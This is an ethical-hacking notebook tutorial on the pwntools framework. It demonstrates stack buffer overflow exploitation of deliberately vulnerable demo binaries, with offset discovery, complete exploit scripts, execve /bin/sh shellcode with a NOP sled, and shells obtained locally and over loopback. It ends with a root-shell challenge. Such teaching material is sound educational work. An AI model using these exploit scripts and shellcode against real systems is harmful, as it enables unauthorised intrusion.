# Pwntools Python Framework

- Complete Tutoraials found here: [https://github.com/Gallopsled/pwntools-tutorial](https://github.com/Gallopsled/pwntools-tutorial)
- Documentation on Pwntools found here: [https://docs.pwntools.com/en/stable/about.html](https://docs.pwntools.com/en/stable/about.html)


- this notebook provides quick tutorails and dmos on most common tasks used in basic binary exploitations

## Introduction

- a grab-bag of tools to make exploitation during CTFs as painless as possible, and to make exploits as easy to read as possible
- makes it easy to do a local exploit, remote exploit or exploit over SSH with a one-line change
- has two main main modules: `pwn` and `pwnlib`

### pwn - Toolbox optimized for CTFs
- `import pwn` or ` from pwn import *` - you'll have access to everythin you need to write an exploit
- we'll see pwntools usage and demos specific to CTFs in [CTF](./CTF.ipynb) notebook
- install pwntools with python package manager `pip`

### Installation
- install the release version on Linux using the following instructions

In [1]:
%%bash
echo kali | sudo -S apt update -y
echo kali | sudo -S apt install -y python3 python3-pip python3-dev git libssl-dev libffi-dev build-essential
echo kali | sudo -S python3 -m pip install --upgrade pip
echo kali | sudo -S python3 -m pip install --upgrade pwntools

Get:1 http://packages.microsoft.com/repos/vscode stable InRelease [3,959 B]
Get:2 http://packages.microsoft.com/repos/vscode stable/main amd64 Packages [217 kB]
Get:3 http://kali.download/kali kali-rolling InRelease [30.5 kB]
Get:4 http://kali.download/kali kali-rolling/main amd64 Packages [17.1 MB]
Get:5 http://kali.download/kali kali-rolling/contrib amd64 Packages [105 kB]
Get:6 http://kali.download/kali kali-rolling/non-free amd64 Packages [202 kB]
Fetched 17.7 MB in 3s (5,130 kB/s)
Reading package lists...
Building dependency tree...
Reading state information...
105 packages can be upgraded. Run 'apt list --upgradable' to see them.
Reading package lists...
Building dependency tree...
Reading state information...
build-essential is already the newest version (12.8).
git is already the newest version (1:2.29.2-1).
git set to manually installed.
libffi-dev is already the newest version (3.3-5).
libffi-dev set to manually installed.
python3 is already the newest version (3.9.0-4).
pyth

[sudo] password for kali: 



dpkg-preconfigure: unable to re-open stdin: No such file or directory


#### help

```bash
┌──(kali㉿K)-[~/EthicalHacking]
└─$ pwn -h                                                                                  2 ⨯
usage: pwn [-h]
           {asm,checksec,constgrep,cyclic,debug,disasm,disablenx,elfdiff,elfpatch,errno,hex,phd,pwnstrip,scramble,shellcraft,template,unhex,update,version}
           ...

Pwntools Command-line Interface

positional arguments:
  {asm,checksec,constgrep,cyclic,debug,disasm,disablenx,elfdiff,elfpatch,errno,hex,phd,pwnstrip,scramble,shellcraft,template,unhex,update,version}
    asm                 Assemble shellcode into bytes
    checksec            Check binary security settings
    constgrep           Looking up constants from header files. Example: constgrep -c freebsd
                        -m ^PROT_ '3 + 4'
    cyclic              Cyclic pattern creator/finder
    debug               Debug a binary in GDB
    disasm              Disassemble bytes into text format
    disablenx           Disable NX for an ELF binary
    elfdiff             Compare two ELF files
    elfpatch            Patch an ELF file
    errno               Prints out error messages
    hex                 Hex-encodes data provided on the command line or stdin
    phd                 Pwnlib HexDump
    pwnstrip            Strip binaries for CTF usage
    scramble            Shellcode encoder
    shellcraft          Microwave shellcode -- Easy, fast and delicious
    template            Generate an exploit template
    unhex               Decodes hex-encoded data provided on the command line or via stdin.
    update              Check for pwntools updates
    version             Pwntools version

optional arguments:
  -h, --help            show this help message and exit
```

### from pwn import * globals

- see all the names imported into global namespace to make your life easier: 
[https://docs.pwntools.com/en/stable/globals.html](https://docs.pwntools.com/en/stable/globals.html)

### Making Connections
- need to talk to the target binary in order to `pwn` it!
- pwntools makes it a breeze...
- unlike other Python libraries, pwn doesn't seem to work directly on Jupyter Notebook
- let's use Python prompt on termial to demostrate some quick one liners

```bash

┌──(kali㉿K)-[~/EthicalHacking]
└─$ python                                                                                127 ⨯
Python 3.8.5 (default, Sep  4 2020, 07:30:14) 
[GCC 7.3.0] :: Anaconda, Inc. on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> from pwn import *


>>> sh = process('sh')
[x] Starting local process '/usr/bin/sh'
[+] Starting local process '/usr/bin/sh': pid 16126

>>> sh.sendline(b'sleep 3; echo Hello World!;')
>>> print(sh.recvline())
b'Hello World!\n'

- Interact with the process

>>> sh.interactive()
[*] Switching to interactive mode

whoami  
kali
date
Fri 18 Dec 2020 12:28:44 PM MST

exit
[*] Got EOF while reading in interactive

[*] Process '/bin/sh' stopped with exit code 0 (pid 16145)
[*] Got EOF while sending in interactive
```

### Packing and Unpacking Integers

- integers such as memory addresses need to be sent to the target program according to it's endianness (x86 is little endian)
- pwntools can detect and automatically pack and unpack integers according to the endianness of the target program

```bash
>>> from pwn import *
>>> p32(0xdeadbeef, endian='big')
b'\xde\xad\xbe\xef'
>>> p32(0xdeadbeef)
b'\xef\xbe\xad\xde'


### Basic IO
- `recv(n)` - Recieves any number of available bytes
- `recvline()` - Receives data until a newline is encountered
- `recvuntil(delim)` - Receives data until a delimeter is encountered
- `send(data)` - Sends data
- `sendline(data)` - Sends data plus a newline char

### Manipulating integers

- `pack(int)` - Sends a word-size (4 bytes) packed (endian-aware) integer
- `unpack()` - Receives and unpacks a word-size integer (endian-aware)

#### Demos
- see `pwntools-demos/` for demos on basic IO and interacting with processes

In [2]:
! cat ./demos/stack_overflow/so_stdio.cpp

#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <iostream>
using namespace std;

#define BUFSIZE 128

using namespace std;

void give_shell(){
    // Set the gid to the effective gid
    // this prevents /bin/sh from dropping the privileges
    gid_t gid = getegid();
    setresgid(gid, gid, gid);
    system("/bin/sh");
}

char * mgets(char *dst) {
    char *ptr = dst;
    int ch; 
	/* skip leading white spaces */ 
    while ((ch = getchar()) && (ch == ' ' or ch == '\t') )
        ; 

    if ((ch == '\n') or (ch == EOF)) { 
        *ptr = '\0';
        return dst; 
    } 
    else
        *ptr = ch;

    /* now read the rest until \n or EOF */ 
    while (true) {
        ch = getchar();
        if (ch == '\n' or ch == EOF) break;
        *(++ptr) = ch; 
    }
    *(++ptr) = 0;
    return dst;
}

void bad() {
    char buffer[BUFSIZE];
    printf("buffer is at %p\n", buffer);
    cout << "Give me some text: ";
    fflush(stdou

In [3]:
%%bash
# compile the target program
input="./demos/stack_overflow/so_stdio.cpp"
output="so_stdio.exe"
echo kali | sudo -S ./compile.sh $input $output

[sudo] password for kali: 

In [4]:
! python -c 'print("Hello World")' | ./so_stdio.exe

buffer is at 0xffffc2d0
Give me some text: Acknowledged: Hello World with length 11
Good bye!


### pwntools stdio demo

- instead of manually interacting with the target program, pwntools provides features to programmatically interact with the program
    - though you can still manually interact with the program
    
- run exploit_demo.py file and see the automated interactions for sending and receiving data to and from the target program

```bash
┌──(kali㉿K)-[~/EthicalHacking]
└─$ python pwn_io_demo.py
[*] '/home/kali/EthicalHacking/so_stdio.exe'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments
[+] Starting local process '/home/kali/EthicalHacking/so_stdio.exe': pid 38006
received:  b'buffer is at 0xffffc320'
[*] Switching to interactive mode
[*] Process '/home/kali/EthicalHacking/so_stdio.exe' stopped with exit code 0 (pid 38006)
Give me some text: Acknowledged: Data sent by code more data...no more! with length 38
Good bye!
[*] Got EOF while reading in interactive
$  
```

- armed with this knowledge, let's see how to create a template and complete the exploit code using **pwntools**
- the goal is to force the target program to execute **give_shell()**

### Force the target program to execute give_shell( )

#### steps
1. creae a template
2. find the offset required to overwrite the caller's return address
3. find the address of **give_shell()**
4. send some junk and the controlled address to execute **give_shell()**

1. create a template

```bash
┌──(kali㉿K)-[~/EthicalHacking]
└─$ pwn template so_stdio.exe > so_stdio_exploit.py
```

2. find the offset required to overwrite the caller's return address
    - can use gdb-peda as seen in previous notebooks
    - use pwntools cyclic API

- let's use pwntools to find the offset


```bash
(base) kali@kali:~/EthicalHacking/demos/ctf$ gdb -q vuln.exe
Reading symbols from vuln.exe...

gdb-peda$ pattern create 200 pattern.txt
Writing pattern of 200 chars to filename "pattern.txt"

gdb-peda$ run < pattern.tx
Starting program: /home/kali/projects/EthicalHacking-Notebooks/demos/ctf/vuln.exe < pattern.tx
buffer is at 0xffffc2f0
Give me some text: Acknowledged: AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0xf7fb2c00 --> 0xf7faf990 --> 0xf7ef7160 (<_ZNSoD1Ev>:     push   ebx)
EBX: 0x6c414150 ('PAAl')
ECX: 0x6c0 
EDX: 0x8051bb0 ("Acknowledged: AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAA"...)
ESI: 0xf7de6000 --> 0x1e4d6c 
EDI: 0xf7de6000 --> 0x1e4d6c 
EBP: 0x41514141 ('AAQA')
ESP: 0xffffc380 ("RAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
EIP: 0x41416d41 ('AmAA')
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x41416d41
[------------------------------------stack-------------------------------------]
0000| 0xffffc380 ("RAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0004| 0xffffc384 ("AASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0008| 0xffffc388 ("ApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0012| 0xffffc38c ("TAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0016| 0xffffc390 ("AAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0020| 0xffffc394 ("ArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0024| 0xffffc398 ("VAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0028| 0xffffc39c ("AAWAAuAAXAAvAAYAAwAAZAAxAAyA")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x41416d41 in ?? ()

gdb-peda$ patts
Registers contain pattern buffer:
EBX+0 found at offset: 132
EBP+0 found at offset: 136
EIP+0 found at offset: 140 <---------- 140 JUNK + 4 bytes return address!!!
Registers point to pattern buffer:
[ESP] --> offset 144 - size ~56   
Pattern buffer found at:
0x08051bbe : offset    0 - size  200 ([heap])
0x08051fc0 : offset    0 - size  200 ([heap])
0xf7c000cd : offset 33208 - size    4 (/usr/lib32/libm-2.31.so)
0xffffc2f0 : offset    0 - size  200 ($sp + -0x90 [-36 dwords])
References to pattern buffer found at:
0xf7de6584 : 0x08051fc0 (/usr/lib32/libc-2.31.so)
0xf7de6588 : 0x08051fc0 (/usr/lib32/libc-2.31.so)
0xf7de658c : 0x08051fc0 (/usr/lib32/libc-2.31.so)
0xf7de6590 : 0x08051fc0 (/usr/lib32/libc-2.31.so)
0xf7de6594 : 0x08051fc0 (/usr/lib32/libc-2.31.so)
0xf7de6598 : 0x08051fc0 (/usr/lib32/libc-2.31.so)
0xf7de659c : 0x08051fc0 (/usr/lib32/libc-2.31.so)
0xf7e62d2c : 0xffffc2f0 (/usr/lib32/libstdc++.so.6.0.28)
0xffffbde0 : 0xffffc2f0 ($sp + -0x5a0 [-360 dwords])

```

- GDB-PEDA says that we need 140 bytes of JUNK + 4 bytes to overwrite the caller's return address
- since the vuln.exe program prints `buffer is at ....`, let's receive and discard it
- it then prompts user 
- let's add `io.send("A"*140)` line to our exploit_vuln.py file

- now let's find the address of **give_shell()**

```bash
(base) kali@kali:~/EthicalHacking/demos/ctf$ nm vuln.exe 
0804c040 B __bss_start
0804c040 b completed.0
         U __cxa_atexit@@GLIBC_2.1.3
0804c038 D __data_start
0804c038 W data_start
08049140 t deregister_tm_clones
08049120 T _dl_relocate_static_pie
080491c0 t __do_global_dtors_aux
0804bef8 d __do_global_dtors_aux_fini_array_entry
0804c03c D __dso_handle
0804befc d _DYNAMIC
0804c040 D _edata
0804c044 B _end
         U fflush@@GLIBC_2.0
080494d8 T _fini
0804a000 R _fp_hw
080491f0 t frame_dummy
0804bef0 d __frame_dummy_init_array_entry
0804a2ac r __FRAME_END__
         U getchar@@GLIBC_2.0
         U getegid@@GLIBC_2.0
0804c000 d _GLOBAL_OFFSET_TABLE_
08049444 t _GLOBAL__sub_I__Z10give_shellv
         w __gmon_start__
0804a050 r __GNU_EH_FRAME_HDR
08049000 T _init
0804bef8 d __init_array_end
0804bef0 d __init_array_start
0804a004 R _IO_stdin_used
080494d0 T __libc_csu_fini
08049470 T __libc_csu_init
         U __libc_start_main@@GLIBC_2.0
08049385 T main
         U printf@@GLIBC_2.0
08049180 t register_tm_clones
         U setresgid@@GLIBC_2.0
080490e0 T _start
         U stdout@@GLIBC_2.0
         U system@@GLIBC_2.0
0804c040 D __TMC_END__
08049468 T __x86.get_pc_thunk.ax
080494d1 T __x86.get_pc_thunk.bp
08049130 T __x86.get_pc_thunk.bx
080491f2 T _Z10give_shellv  <----------------- !!!! our target function!!!!
080492d3 T _Z3badv
080493eb t _Z41__static_initialization_and_destruction_0ii
08049238 T _Z5mgetsPc
         U _ZNSolsEPFRSoS_E@@GLIBCXX_3.4
         U _ZNSt8ios_base4InitC1Ev@@GLIBCXX_3.4
         U _ZNSt8ios_base4InitD1Ev@@GLIBCXX_3.4
         U _ZSt4cout@@GLIBCXX_3.4
         U _ZSt4endlIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_@@GLIBCXX_3.4
0804a008 r _ZStL19piecewise_construct
0804c041 b _ZStL8__ioinit
         U _ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc@@GLIBCXX_3.4

```

- let's add `io.sendline("\xf2\x91\x04\x08") # 080491f2` to the demos/ctf/exploit_vuln.py file
- now the exploit code is ready, let's see the complete exploit code
- see the code added in the FIXME section

```python
####FIXME
....
####
```

```python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template ./vuln.exe --host 127.0.0.1 --port 1234
from pwn import *

# Set up pwntools for the correct architecture
exe = context.binary = ELF('./vuln.exe')

# Many built-in settings can be controlled on the command-line and show up
# in "args".  For example, to dump all data sent/received, and disable ASLR
# for all created processes...
# ./exploit.py DEBUG NOASLR
# ./exploit.py GDB HOST=example.com PORT=4141
host = args.HOST or '127.0.0.1'
port = int(args.PORT or 1234)

def local(argv=[], *a, **kw):
    '''Execute the target binary locally'''
    if args.GDB:
        return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
    else:
        return process([exe.path] + argv, *a, **kw)

def remote(argv=[], *a, **kw):
    '''Connect to the process on the remote host'''
    io = connect(host, port)
    if args.GDB:
        gdb.attach(io, gdbscript=gdbscript)
    return io

def start(argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    if args.LOCAL:
        return local(argv, *a, **kw)
    else:
        return remote(argv, *a, **kw)

# Specify your GDB script here for debugging
# GDB will be launched if the exploit is run via e.g.
# ./exploit.py GDB
gdbscript = '''
tbreak main
continue
'''.format(**locals())

#===========================================================
#                    EXPLOIT GOES HERE
#===========================================================
# Arch:     i386-32-little
# RELRO:    Partial RELRO
# Stack:    No canary found
# NX:       NX disabled
# PIE:      No PIE (0x8048000)
# RWX:      Has RWX segments

io = start()

#########################################################FIXME
first_line = io.recvline() # not really needed to do this...
io.send("A"*140)
# pwntools provides better way to pack the addresses!
io.sendline("\xf2\x91\x04\x08") # 080491f2
#########################################################

# shellcode = asm(shellcraft.sh())
# payload = fit({
#     32: 0xdeadbeef,
#     'iaaa': [1, 2, 'Hello', 3]
# }, length=128)
# io.send(payload)
# flag = io.recv(...)
# log.success(flag)

io.interactive()

```

### Local process exploit

- let's run the `demos/ctf/exploit_vuln.py` code first to a local process/program on the same folder!
    - meaning no IP and PORT to connect to
    
```bash
(base) kali@kali:~EthicalHacking/demos/ctf$ python exploit_vuln.py LOCAL
[*] '/home/kali/projects/EthicalHacking-Notebooks/demos/ctf/vuln.exe'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments
[+] Starting local process '/home/kali/projects/EthicalHacking-Notebooks/demos/ctf/vuln.exe': pid 13307
[*] Switching to interactive mode
Give me some text: Acknowledged: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xf2\x9
$ whoami
kali
$ exit
[*] Got EOF while reading in interactive
$ 
[*] Interrupted
(base) kali@kali:~/projects/EthicalHacking-Notebooks/demos/ctf$ 
```

### Remote process exploit

- let's send the payload to the remote server loopback in this example
    - simply remove the LOCAL argument to exploit program
- we get a shell prompt and you can cat the flag.txt file if it was a CTF competition!

```bash
(base) kali@kali:~/EthicalHacking/demos/ctf$ python exploit_vuln.py 
[*] '/home/kali/projects/EthicalHacking-Notebooks/demos/ctf/vuln.exe'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments
[+] Opening connection to 127.0.0.1 on port 1234: Done
[*] Switching to interactive mode
Give me some text: Acknowledged: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xf2\x9
$ ls
exploit_demo.py
exploit.py
exploit_vuln.py
flag.txt
Makefile
netcat-loop.sh
pattern.tx
pattern.txt
peda-session-vuln.exe.txt
vuln.cpp
vuln.exe
$ cat flag.txt
CTF{YayBabbyGet}v$  

```

## Send payload with shellcode

- pwntools provides built-in functionalities to create payload with shellcode of choice and send it to the target program locally or remotely

- let's demonstrate the exploition of demos/stack_overflow/so_stdio.cpp with pwntools

In [1]:
! cat demos/stack_overflow/so_stdio.cpp

#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <iostream>
using namespace std;

#define BUFSIZE 128

using namespace std;

void give_shell(){
    // Set the gid to the effective gid
    // this prevents /bin/sh from dropping the privileges
    gid_t gid = getegid();
    setresgid(gid, gid, gid);
    system("/bin/sh");
}

char * mgets(char *dst) {
    char *ptr = dst;
    int ch; 
	/* skip leading white spaces */ 
    while ((ch = getchar()) && (ch == ' ' or ch == '\t') )
        ; 

    if ((ch == '\n') or (ch == EOF)) { 
        *ptr = '\0';
        return dst; 
    } 
    else
        *ptr = ch;

    /* now read the rest until \n or EOF */ 
    while (true) {
        ch = getchar();
        if (ch == '\n' or ch == EOF) break;
        *(++ptr) = ch; 
    }
    *(++ptr) = 0;
    return dst;
}

void bad() {
    char buffer[BUFSIZE];
    printf("buffer is at %p\n", buffer);
    cout << "Give me some text: ";
    fflush(stdou

In [6]:
%%bash
input="demos/stack_overflow/so_stdio.cpp"
output="demos/stack_overflow/so_stdio.exe"
echo kali | sudo -S ./compile.sh $input $output
ls -al $output

-rwxr-xr-x 1 root root 33884 Dec 16 02:46 demos/stack_overflow/so_stdio.exe


[sudo] password for kali: 

- we can now create an exploit code template using **pwn** and update it as necessary; let's create the template for local exploit (no remote code will be included!)

```bash
(base) kali@kali:~/EthicalHacking/demos/stack_overflow$ pwn template ./so_stdio.exe > so_stdio_exploit.py

```

- the template looks like the following to start with

```python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template ./so_stdio.exe
from pwn import *

# Set up pwntools for the correct architecture
exe = context.binary = ELF('./so_stdio.exe')

# Many built-in settings can be controlled on the command-line and show up
# in "args".  For example, to dump all data sent/received, and disable ASLR
# for all created processes...
# ./exploit.py DEBUG NOASLR


def start(argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    if args.GDB:
        return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
    else:
        return process([exe.path] + argv, *a, **kw)

# Specify your GDB script here for debugging
# GDB will be launched if the exploit is run via e.g.
# ./exploit.py GDB
gdbscript = '''
tbreak main
continue
'''.format(**locals())

#===========================================================
#                    EXPLOIT GOES HERE
#===========================================================
# Arch:     i386-32-little
# RELRO:    Partial RELRO
# Stack:    No canary found
# NX:       NX disabled
# PIE:      No PIE (0x8048000)
# RWX:      Has RWX segments

io = start()

# shellcode = asm(shellcraft.sh())
# payload = fit({
#     32: 0xdeadbeef,
#     'iaaa': [1, 2, 'Hello', 3]
# }, length=128)
# io.send(payload)
# flag = io.recv(...)
# log.success(flag)

io.interactive()
```

- let's play with the program to learn what it does and how it works...

```bash
(base) kali@kali:~/EthicalHacking/demos/stack_overflow$ ./so_stdio.exe 
buffer is at 0xffffc360
Give me some text: read this!
Acknowledged: read this!
Good bye!
```

- let's find the offset using pwntools cyclic and cyclic_find API
- Python script: demos/stack_overflow/find_offset.py does this for us
- let's see it's contents

```python
#! /usr/bin/env python3

from pwn import *

target_program = "./so_stdio.exe"

elf = ELF(target_program)

p = process(target_program)

# https://docs.pwntools.com/en/stable/util/cyclic.html
# create 200 characters cyclic length
p.sendline(cyclic(200, n=8))
p.wait()

core = p.corefile
offset = cyclic_find(core.read(core.esp, 8), n=8)
print(f'offset = {offset}')
```

- when we run the script, we'll get the offset of 144

```bash
(base) kali@kali:~/EthicalHacking/demos/stack_overflow$ python find_offset.py 
[*] '/home/kali/EthicalHacking/demos/stack_overflow/so_stdio.exe'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments
[+] Starting local process './so_stdio.exe': pid 22754
[*] Process './so_stdio.exe' stopped with exit code -11 (SIGSEGV) (pid 22754)
[+] Parsing corefile...: Done
[*] '/home/kali/EthicalHacking/demos/stack_overflow/core.22754'
    Arch:      i386-32-little
    EIP:       0x61616161
    ESP:       0xffffc250
    Exe:       '/home/kali/EthicalHacking/demos/stack_overflow/so_stdio.exe' (0x8048000)
    Fault:     0x61616161
offset = 144  <------- !!!offset of the caller's return address from buffer address!!!
```

- base address of buffer is conviniently printed for us; we can parse it in exploit code
- we'll use the binary shellcode we've genereated from PEDA found in `shellcode/x-86-linux-sh.py` file
- the final exploit code looks like the following

```python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template ./so_stdio.exe

import pwn

# Set up pwntools for the correct architecture
exe = pwn.context.binary = pwn.ELF('./so_stdio.exe')

# Many built-in settings can be controlled on the command-line and show up
# in "args".  For example, to dump all data sent/received, and disable ASLR
# for all created processes...
# ./exploit.py DEBUG NOASLR


def start(argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    if pwn.args.GDB:
        return pwn.gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
    else:
        return pwn.process([exe.path] + argv, *a, **kw)

# Specify your GDB script here for debugging
# GDB will be launched if the exploit is run via e.g.
# ./exploit.py GDB
gdbscript = '''
tbreak main
continue
'''.format(**locals())

#===========================================================
#                    EXPLOIT GOES HERE
#===========================================================
# Arch:     i386-32-little
# RELRO:    Partial RELRO
# Stack:    No canary found
# NX:       NX disabled
# PIE:      No PIE (0x8048000)
# RWX:      Has RWX segments

io = start()

offset = 144
io.recvuntil(' at ')
# get the buffer address printed
address = int(io.recvline(False), 16)
#print(f'address = {address}')
ret_address = pwn.p32(address)*4
#shellcode = asm(shellcraft.i386.linux.sh()) # doesn't work!

# x86/linux/exec: 24 bytes
shellcode_user = (
    b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31"
    b"\xc9\x89\xca\x6a\x0b\x58\xcd\x80"
)

sled_len = offset-len(ret_address)-len(shellcode_user)

NOPSled = b'\x90'*sled_len # asm('nop')
io.sendline(NOPSled+shellcode_user+ret_address)

io.interactive()

```

- next is to just run the so_stdio_exploit.py from terminal where the target program and the exploit code reside
- we'll get a shell!

```python
(base) kali@kali:~/EthicalHacking/demos/stack_overflow$ python so_stdio_exploit.py
[*] '/home/kali/EthicalHacking/demos/stack_overflow/so_stdio.exe'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments
[+] Starting local process '/home/kali/EthicalHacking/demos/stack_overflow/so_stdio.exe': pid 50042
[*] Switching to interactive mode
Give me some text: Acknowledged: \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x901\xc0Ph//shh/bin\x89\xe31\xc9\x89\xcaj\x0b̀`\xc1\xff\xff`\xc1\xff\xff`\xc1\xff\xff`\xc1\xff\xff 144
$ 
$ 
$ whoami
kali
$ id
uid=1000(kali) gid=1000(kali) groups=1000(kali),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),117(bluetooth),131(scanner)
$  
```

## Challenge

1. Create Python exploit code to get a root shell (instead of the user shell)
    - just modify the above Python demo
    - test to make sure the exploit code works
